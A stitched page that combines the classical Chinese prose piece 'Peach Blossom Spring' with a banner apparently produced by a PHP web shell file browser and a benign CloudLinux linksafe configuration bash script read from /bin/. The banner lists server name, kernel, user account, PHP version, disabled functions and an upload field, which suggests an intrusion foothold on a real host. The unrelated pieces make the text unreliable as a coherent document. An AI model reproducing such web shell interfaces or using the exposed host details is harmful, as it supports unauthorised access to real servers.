晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。 林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。 见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝) 既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。 南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。
|
Server : Apache System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64 User : rainic ( 1014) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system Directory : /bin/ |
Upload File : |
#!/bin/bash
# CloudLinux Links Traversal Protection configure utility
set -o pipefail
PARAM_ALLOW_SGID="fs.protected_symlinks_allow_gid"
PARAM_ALLOW_HGID="fs.protected_hardlinks_allow_gid"
PARAM_S_CREATE="fs.protected_symlinks_create"
PARAM_H_CREATE="fs.protected_hardlinks_create"
SYSCTL_FILE="/etc/sysctl.d/cloudlinux-linksafe.conf"
SYSTEM_LINKSAFE_GID="$(getent group linksafe | cut -d: -f3)"
MAIN_SYSCTL_FILE="/etc/sysctl.conf"
CONVERT=""
if [[ $EUID -ne 0 ]]; then
echo "This script must be run as root"
exit 1
fi
function fix_linksafe {
# fix permissions for alt-php packages installed without linksafe group
find /opt/alt/php* \( -user root -a ! -group root -a ! -group linksafe \) -exec chown -h root:linksafe {} \; &> /dev/null
# fix permissions for alt-python packages installed without linksafe group
find /opt/alt/python* \( -user root -a ! -group root -a ! -group linksafe \) -exec chown -h root:linksafe {} \; &> /dev/null
# fix permissions for alt-ruby packages installed without linksafe group
find /opt/alt/ruby* \( -user root -a ! -group root -a ! -group linksafe \) -exec chown -h root:linksafe {} \; &> /dev/null
# fix permissions for native php
chown root:linksafe /usr/selector.etc/php.ini &> /dev/null
chown root:linksafe /usr/selector/lsphp &> /dev/null
chown root:linksafe /usr/selector/php &> /dev/null
chown root:linksafe /usr/selector/php-cli &> /dev/null
if [ -e /usr/sbin/cagefsctl ] && [ -e /usr/share/cagefs-skeleton/bin ]; then
if /usr/sbin/cagefsctl --setup-cl-selector &> /dev/null; then
if [ -e /usr/share/cagefs/need.remount ]; then
if /usr/sbin/cagefsctl --remount-all &> /dev/null; then
rm -f /usr/share/cagefs/need.remount &> /dev/null
fi
fi
fi
fi
}
function check_params_in_sysctl_file {
local ret_code=0
if ! grep "$PARAM_ALLOW_SGID" "$SYSCTL_FILE" > /dev/null; then
let ret_code+=1
fi
if ! grep "$PARAM_ALLOW_HGID" "$SYSCTL_FILE" > /dev/null; then
let ret_code+=1
fi
if ! grep "$PARAM_S_CREATE" "$SYSCTL_FILE" > /dev/null; then
let ret_code+=1
fi
if ! grep "$PARAM_H_CREATE" "$SYSCTL_FILE" > /dev/null; then
let ret_code+=1
fi
echo ${ret_code}
return ${ret_code}
}
function migrate_linksafe_params {
if [ -n "$SYSTEM_LINKSAFE_GID" ]; then
if ! grep "# SecureLinks Link Traversal" "${SYSCTL_FILE}" > /dev/null; then
echo "# SecureLinks Link Traversal Protection Section" >> "${SYSCTL_FILE}"
fi
if grep "$PARAM_S_CREATE" "$MAIN_SYSCTL_FILE" > /dev/null; then
migrate_symlink_value=$(grep "$PARAM_S_CREATE" ${MAIN_SYSCTL_FILE} | awk -F "=" '{print $2}' | sed "s/\ //g")
fi
if ! grep "$PARAM_S_CREATE" "${SYSCTL_FILE}" > /dev/null; then
if [[ 1 != "$migrate_symlink_value" ]]; then
echo "$PARAM_S_CREATE = 0" >> "${SYSCTL_FILE}"
else
echo "$PARAM_S_CREATE = 1" >> "${SYSCTL_FILE}"
fi
fi
if grep "$PARAM_H_CREATE" "$MAIN_SYSCTL_FILE" > /dev/null; then
migrate_hardlink_value=$(grep "$PARAM_H_CREATE" ${MAIN_SYSCTL_FILE} | awk -F "=" '{print $2}' | sed "s/\ //g")
fi
if ! grep "$PARAM_H_CREATE" "${SYSCTL_FILE}" > /dev/null; then
if [[ 1 != "$migrate_hardlink_value" ]]; then
echo "$PARAM_H_CREATE = 0" >> "${SYSCTL_FILE}"
else
echo "$PARAM_H_CREATE = 1" >> "${SYSCTL_FILE}"
fi
fi
if ! grep "$PARAM_ALLOW_SGID" "${SYSCTL_FILE}" > /dev/null; then
echo "$PARAM_ALLOW_SGID = $SYSTEM_LINKSAFE_GID" >> "${SYSCTL_FILE}"
fi
if ! grep "$PARAM_ALLOW_HGID" "${SYSCTL_FILE}" > /dev/null; then
echo "$PARAM_ALLOW_HGID = $SYSTEM_LINKSAFE_GID" >> "${SYSCTL_FILE}"
fi
fi
}
TEMP=$(getopt -o c --long convert -- "$@")
eval set -- "$TEMP"
while true; do
case "$1" in
-c | --convert ) CONVERT="true"; shift ;;
* ) break ;;
esac
done
if [[ "$SYSTEM_LINKSAFE_GID" == "" ]]; then
groupadd -r linksafe
SYSTEM_LINKSAFE_GID="$(getent group linksafe | cut -d: -f3)"
fi
if id mailman &> /dev/null; then
usermod -a -G linksafe mailman &> /dev/null
fi
if [ ! -e "$SYSCTL_FILE" ] && [ -e /proc/sys/fs/protected_symlinks_allow_gid -o ! -z "$CONVERT" ]; then
touch "$SYSCTL_FILE"
fi
if [ -e /proc/sys/fs/protected_symlinks_allow_gid -o ! -z "$CONVERT" ]; then
SYSCTL_LINKSAFE_GID=$(grep -F "$PARAM_ALLOW_SGID" "$SYSCTL_FILE" | awk '{print $3}')
if [[ 0 != "$(check_params_in_sysctl_file)" ]]; then
migrate_linksafe_params
fi
if [[ "$SYSCTL_LINKSAFE_GID" != "$SYSTEM_LINKSAFE_GID" ]]; then
sed -i -e "s/${PARAM_ALLOW_SGID}\s*=.*/${PARAM_ALLOW_SGID} = ${SYSTEM_LINKSAFE_GID}/" "$SYSCTL_FILE" &> /dev/null
sed -i -e "s/${PARAM_ALLOW_HGID}\s*=.*/${PARAM_ALLOW_HGID} = ${SYSTEM_LINKSAFE_GID}/" "$SYSCTL_FILE" &> /dev/null
fi
fix_linksafe
/usr/bin/plesk_configure "$CONVERT"
/usr/share/cloudlinux-linksafe/cpanel/hooks/cpanel-linksafe-install-hooks "$CONVERT"
sysctl --system &> /dev/null
else
fix_linksafe
fi